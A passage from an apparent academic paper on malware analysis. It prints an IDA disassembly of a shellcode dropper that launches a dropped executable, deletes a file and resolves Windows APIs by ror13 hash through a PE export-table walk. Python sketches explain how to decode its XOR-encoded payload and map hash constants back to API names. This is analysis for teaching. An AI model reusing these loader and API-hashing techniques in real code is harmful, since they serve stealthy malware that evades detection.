seg000:00000D45 push 0
seg000:00000D47 push [edi+SCRATCH.String3] ; c:\~.exe
seg000:00000D4D call [edi+SCRATCH.pWinExec]
seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]
seg000:00000D56 push 0
seg000:00000D58 call [edi+SCRATCH.pExitProcess]
seg000:00000D58 sub_B45 endp
seg000:00000D58
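
Read as a whole, the tail of sub_B45 recovers an embedded payload from the carrier file: it reads a 4-byte length, seeks back length + 4 bytes from the end of the file, reads that many bytes, and XORs each one with 0x81. An analyst can reproduce this offline without running the sample. The Python sketch below does so under two assumptions that this excerpt does not confirm: that the length field occupies the last four bytes of the file (the first seek lies outside the listing shown here), and that it is little-endian as on x86. The function name extract_payload is illustrative and does not come from the sample.

```python
import struct

XOR_KEY = 0x81  # single-byte key used by the loop at loc_CEA


def extract_payload(carrier: bytes, key: int = XOR_KEY) -> bytes:
    """Recover the XOR-encoded payload appended to a carrier file.

    Assumed layout (an inference, not stated by the listing):
        [ carrier data ][ encoded payload, N bytes ][ N as 4-byte LE ]
    """
    if len(carrier) < 4:
        raise ValueError("carrier too short to hold a length field")

    # Equivalent of the 4-byte ReadFile into SCRATCH.field_4.
    (size,) = struct.unpack("<I", carrier[-4:])
    if size + 4 > len(carrier):
        raise ValueError("length field exceeds carrier size")

    # Equivalent of SetFilePointer(h, -(size + 4), NULL, FILE_END).
    start = len(carrier) - (size + 4)
    encoded = carrier[start:start + size]

    # Equivalent of the xor byte ptr [ebx], 81h loop.
    return bytes(b ^ key for b in encoded)
```

The not/inc pair at 00000CBB computes the two's-complement negation of field_4 + 4, which is the negative seek offset that the sketch expresses as len(carrier) - (size + 4).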
seg000:00000D5B
seg000:00000D5B ; S U B R O U T I N E

seg000:00000D5B
seg000:00000D5B ; Attributes: bp-based frame
seg000:00000D5B
seg000:00000D5B resolve_func proc near ; CODE XREF: sub_B45+6Ap
seg000:00000D5B ; sub_B45+7Ap ...
seg000:00000D5B
seg000:00000D5B arg_0 = dword ptr 8
seg000:00000D5B arg_4 = dword ptr 0Ch
seg000:00000D5B
seg000:00000D5B push ebp ; standard function prologue
seg000:00000D5C mov ebp, esp ; standard function prologue
seg000:00000D5E push edi ; save the scratch pad again
seg000:00000D5F mov edi, [ebp+arg_0] ; move arg[0] into edi
seg000:00000D62 mov ebx, [ebp+arg_4] ; move arg[1] into ebx
seg000:00000D65 push esi
seg000:00000D66 mov esi, [ebx+3Ch]
seg000:00000D69 mov esi, [esi+ebx+78h]
seg000:00000D6D add esi, ebx
seg000:00000D6F push esi
seg000:00000D70 mov esi, [esi+20h]
seg000:00000D73 add esi, ebx
seg000:00000D75 xor ecx, ecx
seg000:00000D77 dec ecx
seg000:00000D78
seg000:00000D78 loc_D78: ; CODE XREF: resolve_func+36j
seg000:00000D78 inc ecx
seg000:00000D79 lodsd
seg000:00000D7A add eax, ebx
seg000:00000D7C push esi
seg000:00000D7D xor esi, esi
seg000:00000D7F
seg000:00000D7F loc_D7F: ; CODE XREF: resolve_func+31j
seg000:00000D7F movsx edx, byte ptr [eax]
seg000:00000D82 cmp dh, dl
seg000:00000D84 jz short loc_D8E
seg000:00000D86 ror esi, 0Dh ; rotate right function
seg000:00000D89 add esi, edx
seg000:00000D8B inc eax
seg000:00000D8C jmp short loc_D7F
seg000:00000D8E ; ---------------------------------------------------------------------------
seg000:00000D8E
seg000:00000D8E loc_D8E: ; CODE XREF: resolve_func+29j
seg000:00000D8E cmp edi, esi
seg000:00000D90 pop esi
seg000:00000D91 jnz short loc_D78
seg000:00000D93 pop edx
seg000:00000D94 mov ebp, ebx
seg000:00000D96 mov ebx, [edx+24h]
seg000:00000D99 add ebx, ebp
seg000:00000D9B mov cx, [ebx+ecx*2]
seg000:00000D9F mov ebx, [edx+1Ch]
seg000:00000DA2 add ebx, ebp
seg000:00000DA4 mov eax, [ebx+ecx*4]
seg000:00000DA7 add eax, ebp
seg000:00000DA9 pop esi
seg000:00000DAA pop edi
seg000:00000DAB pop ebp
seg000:00000DAC retn 8
seg000:00000DAC resolve_func endp
seg000:00000DAC
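
The inner loop at loc_D7F is a rotate-and-add hash over an export name: for each character, the accumulator in esi is rotated right by 13 bits and the character is added, and the result is compared with the hash passed in arg_0. Analysts commonly precompute this hash for known API names so that constants in the shellcode can be mapped back to functions. The following Python sketch mirrors the loop; the helper names ror32 and ror13_hash are illustrative, and the sketch assumes ASCII names, for which the sign extension done by movsx makes no difference.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Hash an export name the way the loop at loc_D7F does."""
    h = 0
    # encode("ascii") rejects bytes >= 0x80, where movsx would sign-extend.
    for byte in name.encode("ascii"):
        h = ror32(h, 0x0D)          # ror esi, 0Dh
        h = (h + byte) & 0xFFFFFFFF  # add esi, edx
    return h


if __name__ == "__main__":
    for api in ("WinExec", "ExitProcess", "CloseHandle"):
        print(f"{api}: {ror13_hash(api):08X}")
```

For example, ror13_hash("WinExec") evaluates to 0x0E8AFE98, so that constant appearing as the first argument to resolve_func would indicate a lookup of WinExec.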
seg000:00000DAF ; ---------------------------------------------------------------------------
seg000:00000DAF
seg000:00000DAF loc_DAF: ; CODE XREF: seg000:00000B40j
seg000:00000DAF call sub_B45
seg000:00000DAF ; ---------------------------------------------------------------------------
seg000:00000DB4 dd 0A2000h
seg000:00000DB8 aC:
seg000:00000DB8 unicode 0, <c:\~$>,0
seg000:00000DC4 aC_exe:
seg000:00000DC4 unicode 0, <c:\~.exe>,0
seg000:00000DD6 aC_exe_0 db 'c:\~.exe',0
seg000:00000DDF db 0Eh
seg000:00000DE0 db 0
seg000:00000DE1 db 0FFh
seg000:00000DE4 endp
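
The offsets used by resolve_func (3Ch, 78h, 20h, 24h, 1Ch) correspond to a walk of the PE export directory of a loaded module: e_lfanew, the export directory RVA, AddressOfNames, AddressOfNameOrdinals, and AddressOfFunctions. The Python sketch below performs the same walk over a memory-mapped PE32 image held in a bytes object, which lets an analyst check which export a given hash selects. It is a simplified illustration under stated assumptions: RVAs are used directly as offsets (true for a mapped image, not for a file on disk), the loop is bounded by NumberOfNames (the listing has no such bound), and all function names are hypothetical.

```python
import struct


def u32(image: bytes, offset: int) -> int:
    return struct.unpack_from("<I", image, offset)[0]


def u16(image: bytes, offset: int) -> int:
    return struct.unpack_from("<H", image, offset)[0]


def cstring(image: bytes, offset: int) -> str:
    end = image.index(b"\x00", offset)
    return image[offset:end].decode("ascii")


def ror13_hash(name: str) -> int:
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF  # ror esi, 0Dh
        h = (h + byte) & 0xFFFFFFFF               # add esi, edx
    return h


def resolve_by_hash(image: bytes, target_hash: int):
    """Return (export name, function RVA) for the matching hash, else None."""
    pe = u32(image, 0x3C)                   # mov esi, [ebx+3Ch]
    export_dir = u32(image, pe + 0x78)      # mov esi, [esi+ebx+78h]
    name_count = u32(image, export_dir + 0x18)   # NumberOfNames (added bound)
    functions = u32(image, export_dir + 0x1C)    # AddressOfFunctions
    names = u32(image, export_dir + 0x20)        # AddressOfNames
    ordinals = u32(image, export_dir + 0x24)     # AddressOfNameOrdinals

    for i in range(name_count):
        name = cstring(image, u32(image, names + 4 * i))
        if ror13_hash(name) == target_hash:
            ordinal = u16(image, ordinals + 2 * i)       # mov cx, [ebx+ecx*2]
            return name, u32(image, functions + 4 * ordinal)  # [ebx+ecx*4]
    return None
```

The shellcode adds the module base to the returned RVA to obtain a callable address; the sketch stops at the RVA because it operates on a copy of the image rather than a live process.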

7. CONCLUSION
Malware analysis is becoming an important field of
specialization for forensic analysts. Malware authors are
increasingly profit driven and incorporate techniques to
make their code as stealthy and undetectable as possible.
Much malware is written by professional programmers who
are highly skilled in their craft, have a very good
understanding of digital forensic methods, and endeavor to
make forensic analysis as difficult as possible.

The knowledge domain required to competently
analyze malware is very broad. This paper has presented a
brief introduction to a Malware Analysis Body of Knowledge
that would be suitable for establishing a framework for
competency development and assessment for the field of
malware analysis and for incorporation into academic
curricula. A learning taxonomy is central to the malware
analysis process, and eight domain areas were identified:
malware, programming, anti-forensics, malware analysis,
tools, legal and ethical considerations, environment, and
collection.

REFERENCES
[1]. The Malware Analysis Body of Knowledge - Craig Valli and Murray Brand.
[2]. Reverse Engineering Malware - Lenny Zeltser.
[3]. Malware Analysis: An Introduction - Dennis Distler.
[4]. Introduction to Malware Analysis - Lenny Zeltser.
[5]. Practical Malware Analysis - Kris Kendall.

Author Biography:
Mr. S. Murugan is working as ACTS Team Coordinator at
CDAC, Bangalore. He received a BSc in Physics from
Madurai Kamaraj University, Madurai, in 1989, an MCA
degree in Computer Applications from Alagappa University,
Karaikudi, Tamilnadu, India, and an MPhil (CS) from
Manonmaniam Sundaranar University, Tirunelveli,
Tamilnadu, India. He has 17 years of teaching and
administrative experience at PG level in the field of
Computer Science. He has published 6 papers in national
conferences and 2 in international conferences. His research
interests include Intelligence Network Security Algorithms
and Malware Prevention and Detection mechanisms and
algorithms. He has published 8 books and courseware in the
field of Computer Science.
Dr. K. Kuppusamy is working as an Associate Professor,
Department of Computer Science and Engineering, Alagappa
University, Karaikudi, Tamilnadu, India. He received his
Ph.D. in Computer Science and Engineering from Alagappa
University, Karaikudi, Tamilnadu, in 2007. He has
published many papers in international and national journals
and presented at national and international conferences. His
areas of research interest include Information/Network
Security, Algorithms, Neural Networks, Fault Tolerant
Computing, Software Engineering and Testing, and Operational
Research.